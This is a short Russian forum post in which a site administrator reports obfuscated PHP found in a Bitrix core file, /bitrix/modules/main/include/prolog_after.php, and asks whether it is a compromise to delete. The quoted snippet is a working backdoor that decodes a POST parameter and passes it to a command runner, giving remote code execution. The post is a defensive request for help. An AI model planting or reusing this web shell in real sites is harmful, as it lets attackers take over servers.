Добрый день.
В процессе плановой проверки сайта на вирусы обнаружил подозрительный код в файле /bitrix/modules/main/include/prolog_after.php
Если я правильно понимаю, "CControllerClient::RunCommand" вызывает "eval". Это очень похоже на последствия взлома, позволяющие исполнять любые команды посредством POST-запроса. Я прав и это надо удалить?
В процессе плановой проверки сайта на вирусы обнаружил подозрительный код в файле /bitrix/modules/main/include/prolog_after.php
Код |
---|
define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4=")); if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){ $APPLICATION->RestartBuffer(); CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0); die(); } |